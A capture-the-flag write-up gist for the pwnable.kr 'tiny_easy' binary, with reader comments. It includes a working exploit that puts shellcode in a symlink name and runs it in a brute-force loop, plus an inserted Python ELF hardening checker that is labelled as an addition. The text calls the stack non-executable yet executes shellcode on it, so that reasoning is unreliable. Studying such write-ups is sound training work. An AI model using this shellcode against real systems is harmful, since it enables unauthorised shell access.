@ihciah /README.MD
Last active Oct 25, 2017

Pwnable.kr tiny_easy writeup

ihciah@gmail.com

Running the program, it just crashes. Load it in gdb-peda, break at the entry point and run:

0x8048054:	pop    eax
0x8048055:	pop    edx
0x8048056:	mov    edx,DWORD PTR [edx]
0x8048058:	call   edx

So the program pops argc, pops the argv[0] pointer into EDX, loads the first four bytes of argv[0] and calls that value as an address. If the program is at /home/c/ctf/tiny_easy, the address being called is EDX = 0x6d6f682f ('/hom' read as a little-endian dword).

Trying exec -a AAAA ./tiny_easy, the shell just exits and the ssh connection is lost. We could append & to the command and then fg to switch back to it, but that is too inconvenient. A soft link is simpler: link the name we want to the program, and it runs with the original permissions. Check the protections:

➜  ctf  ./checksec --file tiny_easy 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	FORTIFY	FORTIFIED FORTIFY-able  FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No	0		0	tiny_easy

And the system ASLR is enabled.
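The checksec output above (No PIE, NX, no PT_INTERP because the binary is statically linked) is exactly what a defender checks before deciding whether a binary like this one can ship. As an added example that is not part of the original writeup or of pwnable.kr, here is a small ELF32 program-header reader that derives the same three facts directly from the headers. The two images it inspects are constructed inline (header plus program headers only); the "tiny-like" one reuses the 0x8048054 entry point shown in the gdb output, and the assumption that a missing PT_GNU_STACK means an executable stack on 32-bit x86 Linux is marked in the code.

```python
"""Minimal ELF32 hardening check (PIE / NX / static) read from program headers."""
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS32 = 1
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_INTERP, PT_GNU_STACK = 1, 3, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

EHDR_FMT = "<16sHHIIIIIHHHHHH"   # ELF32 header, 52 bytes, little-endian
PHDR_FMT = "<8I"                  # ELF32 program header, 32 bytes


def parse_elf32(data):
    """Return (e_type, e_entry, [program headers as dicts]) for an ELF32 LE image."""
    if data[:4] != ELF_MAGIC or data[4] != ELFCLASS32:
        raise ValueError("not an ELF32 image")
    fields = struct.unpack_from(EHDR_FMT, data, 0)
    e_type, e_entry, e_phoff = fields[1], fields[4], fields[5]
    e_phentsize, e_phnum = fields[9], fields[10]
    phdrs = []
    for i in range(e_phnum):
        p = struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        phdrs.append({"type": p[0], "vaddr": p[2], "flags": p[6]})
    return e_type, e_entry, phdrs


def hardening_report(data):
    """PIE, static linking and NX, as checksec reports them, derived from the headers."""
    e_type, e_entry, phdrs = parse_elf32(data)
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    if stack:
        nx = not (stack[0]["flags"] & PF_X)
    else:
        # Assumption: with no PT_GNU_STACK at all, 32-bit x86 Linux falls back to an
        # executable stack, so report NX as disabled (checksec-style tools may differ).
        nx = False
    return {
        "entry": e_entry,
        "pie": e_type == ET_DYN,
        "static": not any(p["type"] == PT_INTERP for p in phdrs),
        "gnu_stack_present": bool(stack),
        "nx": nx,
    }


def build_elf32(e_type, entry, segments):
    """Constructed test image: ELF header plus program headers, no segment bodies."""
    phoff, phentsize = struct.calcsize(EHDR_FMT), struct.calcsize(PHDR_FMT)
    ident = ELF_MAGIC + bytes([ELFCLASS32, 1, 1]) + b"\0" * 9   # 32-bit, LE, SysV ABI
    ehdr = struct.pack(EHDR_FMT, ident, e_type, 3, 1, entry, phoff, 0, 0,
                       phoff, phentsize, len(segments), 40, 0, 0)
    phdrs = b"".join(struct.pack(PHDR_FMT, ptype, 0, 0, 0, 0, 0, flags, 0x1000)
                     for ptype, flags in segments)
    return ehdr + phdrs


# Constructed samples, not the real pwnable.kr binary.
TINY_LIKE = build_elf32(ET_EXEC, 0x8048054, [(PT_LOAD, PF_R | PF_W | PF_X)])
HARDENED = build_elf32(ET_DYN, 0x1000, [(PT_INTERP, PF_R),
                                        (PT_LOAD, PF_R | PF_X),
                                        (PT_GNU_STACK, PF_R | PF_W)])

if __name__ == "__main__":
    for name, img in (("tiny-like", TINY_LIKE), ("hardened", HARDENED)):
        print(name, hardening_report(img))
```

Run it against a real file with hardening_report(open(path, "rb").read()); the "hardened" sample shows what the same report looks like for a PIE, dynamically linked binary with a non-executable stack, which is the configuration that would have removed both the fixed addresses and the executable argv area this writeup relies on.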

Since the stack of the program is non-executable and the library is statically linked, we can jump to other stack areas instead, for example the environment and the parameters passed to the program.

We construct a file name of the form [address][NOP]*n[shellcode], make a soft link with that name, and then keep executing it until it succeeds.

mkdir /tmp/ihctiny
cd /tmp/ihctiny
ln -s /home/tiny_easy/tiny_easy `python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`
while true; do ./`python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`; done

Reference: http://www.secbox.cn/hacker/ctf/5547.html


DhavalKapil commented Jun 19, 2016

Nice writeup!

A tiny suggestion: Add shellcode in an environment variable instead of a file name. In that way, you will be able to add a very big NOP sled.


shubhammatta commented Oct 25, 2017

I have a small doubt:
In [address][NOP]*n[shellcode], how did you determine which value of address is to be used?
